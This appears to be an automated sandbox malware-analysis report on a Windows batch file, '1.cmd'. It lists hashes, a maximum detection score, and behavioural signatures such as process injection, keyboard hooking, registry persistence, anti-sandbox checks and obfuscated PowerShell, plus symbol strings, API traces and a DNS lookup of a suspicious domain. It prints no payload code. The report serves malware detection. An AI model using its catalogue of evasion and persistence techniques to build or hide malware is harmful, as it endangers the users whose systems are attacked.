Windows Analysis Report
1.cmd

Overview

General Information

Sample name:	1.cmd
Analysis ID:	1525473
MD5:	19fc666f7494d78a55d6b50a0252c214
SHA1:	8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:	e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

.NET source code contains process injector

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious names

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs a global keyboard hook

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Obfuscated command line found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sets debug register (to hijack the execution of another thread)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential WinAPI Calls Via CommandLine

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powerup Write Hijack DLL

Suspicious command line found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Powershell Execute Batch Script

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: 1.cmd

Virustotal: Detection: 14%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 35_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

35_2_00401000

Source:	Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr

Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390D894 FindFirstFileExW,	19_2_000002241390D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393D894 FindFirstFileExW,	19_2_000002241393D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3D894 FindFirstFileExW,	20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EAD894 FindFirstFileExW,	37_2_0000026504EAD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACD894 FindFirstFileExW,	38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CED894 FindFirstFileExW,	38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64D894 FindFirstFileExW,	39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67D894 FindFirstFileExW,	39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AED894 FindFirstFileExW,	40_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130D894 FindFirstFileExW,	41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCD894 FindFirstFileExW,	42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4D894 FindFirstFileExW,	42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CD894 FindFirstFileExW,	43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4D894 FindFirstFileExW,	43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537AD894 FindFirstFileExW,	44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DD894 FindFirstFileExW,	44_2_00000179537DD894
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653D894 FindFirstFileExW,	45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56D894 FindFirstFileExW,	46_2_000002295D56D894

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: azure-winsecure.com

Source: Microsoft-Windows-LiveId%4Operational.evtx.50.dr	String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000028.00000002.3019367929.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0200000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
